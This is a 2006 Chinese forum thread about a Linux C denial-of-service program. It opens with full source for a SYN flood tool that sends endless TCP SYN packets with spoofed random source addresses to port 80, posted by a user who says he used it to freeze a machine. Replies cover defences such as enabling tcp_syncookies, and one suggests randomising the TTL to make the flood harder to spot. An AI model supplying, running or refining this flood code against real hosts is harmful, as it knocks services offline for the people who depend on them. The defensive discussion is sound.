关于本版精华贴linux下c编程中的DOS攻击程序

liuke432

我用这个程序攻击了一台机器，效果很好，直接不动了。
如果别人有这个程序攻击我，我该怎么防范？

本版精华贴linux下c编程中的DOS攻击程序

1. 
   
2. /******************** DOS.c *****************/
   
3. #include <sys/socket.h>
   
4. #include <netinet/in.h>
   
5. #include <netinet/ip.h>
   
6. #include <netinet/tcp.h>
   
7. #include <stdlib.h>
   
8. #include <errno.h>
   
9. #include <unistd.h>
   
10. #include <stdio.h>
    
11. #include <netdb.h>
    
12. #define DESTPORT 80
    
13. #define LOCALPORT 8888
    
14. void send_tcp(int sockfd,struct sockaddr_in *addr);
    
15. unsigned short check_sum(unsigned short *addr,int len);
    
16. int main(int argc,char **argv)
    
17. {
    
18. int sockfd;
    
19. struct sockaddr_in addr;
    
20. struct hostent *host;
    
21. int on=1;
    
22. if(argc!=2)
    
23. {
    
24. fprintf(stderr,"Usage:%s hostname\n\a",argv[0]);
    
25. exit(1);
    
26. }
    
27. bzero(&addr,sizeof(struct sockaddr_in));
    
28. addr.sin_family=AF_INET;
    
29. addr.sin_port=htons(DESTPORT);
    
30. if(inet_aton(argv[1],&addr.sin_addr)==0)
    
31. {
    
32. host=gethostbyname(argv[1]);
    
33. if(host==NULL)
    
34. {
    
35. fprintf(stderr,"HostName Error:%s\n\a",hstrerror(h_errno));
    
36. exit(1);
    
37. }
    
38. addr.sin_addr=*(struct in_addr *)(host->h_addr_list[0]);
    
39. }
    
40. 
    
41. sockfd=socket(AF_INET,SOCK_RAW,IPPROTO_TCP);
    
42. if(sockfd<0)
    
43. {
    
44. fprintf(stderr,"Socket Error:%s\n\a",strerror(errno));
    
45. exit(1);
    
46. }
    
47. 
    
48. setsockopt(sockfd,IPPROTO_IP,IP_HDRINCL,&on,sizeof(on));
    
49. setuid(getpid());
    
50. send_tcp(sockfd,&addr);
    
51. }
    
52. void send_tcp(int sockfd,struct sockaddr_in *addr)
    
53. {
    
54. char buffer[100];
    
55. struct ip *ip;
    
56. struct tcphdr *tcp;
    
57. int head_len;
    
58. head_len=sizeof(struct ip)+sizeof(struct tcphdr);
    
59. bzero(buffer,100);
    
60. ip=(struct ip *)buffer;
    
61. ip->ip_v=IPVERSION;
    
62. ip->ip_hl=sizeof(struct ip)>>2;
    
63. ip->ip_tos=0;
    
64. ip->ip_len=htons(head_len);
    
65. ip->ip_id=0;
    
66. ip->ip_off=0;
    
67. ip->ip_ttl=MAXTTL;
    
68. ip->ip_p=IPPROTO_TCP;
    
69. ip->ip_sum=0;
    
70. ip->ip_dst=addr->sin_addr;
    
71. 
    
72. tcp=(struct tcphdr *)(buffer +sizeof(struct ip));
    
73. tcp->source=htons(LOCALPORT);
    
74. tcp->dest=addr->sin_port;
    
75. tcp->seq=random();
    
76. tcp->ack_seq=0;
    
77. tcp->doff=5;
    
78. tcp->syn=1;
    
79. tcp->check=0;
    
80. 
    
81. while(1)
    
82. {
    
83. ip->ip_src.s_addr=random();
    
84. tcp->check=check_sum((unsigned short *)tcp,
    
85. sizeof(struct tcphdr));
    
86. sendto(sockfd,buffer,head_len,0,(struct sockaddr *)addr,sizeof(struct sockaddr_in));
    
87. }
    
88. }
    
89. unsigned short check_sum(unsigned short *addr,int len)
    
90. {
    
91. register int nleft=len;
    
92. register int sum=0;
    
93. register short *w=addr;
    
94. short answer=0;
    
95. while(nleft>1)
    
96. {
    
97. sum+=*w++;
    
98. nleft-=2;
    
99. }
    
100. if(nleft==1)
     
101. {
     
102. *(unsigned char *)(&answer)=*(unsigned char *)w;
     
103. sum+=answer;
     
104. }
     
105. sum=(sum>>16)+(sum&0xffff);
     
106. sum+=(sum>>16);
     
107. answer=~sum;
     
108. return(answer);
     
109. }
     

复制代码

linuxcici

很熟悉的代码啊......

ip->ip_src.s_addr=random();


如果接收到的包向它发送一个ICMP响应,如果没有应答的话就拒绝. 这只是我的想法.
或发一个SYN给它, 看看有没有回应.

不过我觉得风暴的攻击更吓人 <(A_A)>

langue

分析行为，然后 block 掉？

BTW，好一点的硬防都应该可以抵御这样的攻击。普通操作系统的 TCP/IP 实现，太脆弱。

liuke432

如果接收到的包向它发送一个ICMP响应,如果没有应答的话就拒绝. 这只是我的想法.
或发一个SYN给它, 看看有没有回应.

如果我是windows系统，我被攻击了，具体有什么办法可以解除攻击？

liuke432

原帖由 langue 于 2006-10-20 20:02 发表
分析行为，然后 block 掉？

可以解释具体一点吗？我是说就被上面这个程序攻击有什么针对性的方法吗？

原帖由 langue 于 2006-10-20 20:02 发表
BTW，好一点的硬防都应该可以抵御这样的攻击。普通操作系统的 TCP/IP 实现，太脆弱。

那意思是pc就没办法防了！  

langue

原帖由 liuke432 于 2006-10-20 20:06 发表

可以解释具体一点吗？我是说就被上面这个程序攻击有什么针对性的方法吗？



那意思是pc就没办法防了！  

最方便的 PC 防护方法：block all

不过这样根本收发不了数据。可能我的理解是错误的，等老大出来再解释一下吧。

liuke432

原帖由 langue 于 2006-10-20 20:12 发表


最方便的 PC 防护方法：block all

不过这样根本收发不了数据。可能我的理解是错误的，等老大出来再解释一下吧。

哦 谢谢 暂时的解决方法只能是拔网线了

JohnBull

个别人不要误导初学者.

Linux的话：

1. 
   
2. echo 1 > /proc/sys/net/ipv4/tcp_syncookies
   

复制代码

platinum

1. 
   
2. ip->ip_ttl=MAXTTL;
   

复制代码

这里最好也 random 一下，否则太有规律了
另外

1. 
   
2. ip->ip_id=0;
   

复制代码

不知道这个传出去以后对方接受到的是什么样子？会不会被沿途的 nat 设备或 router 改变了？没做过实验

liuke432

原帖由 JohnBull 于 2006-10-20 22:23 发表

Linux的话：

1. 
   
2. echo 1 > /proc/sys/net/ipv4/tcp_syncookies
   

复制代码

请问斑竹这是什么原理？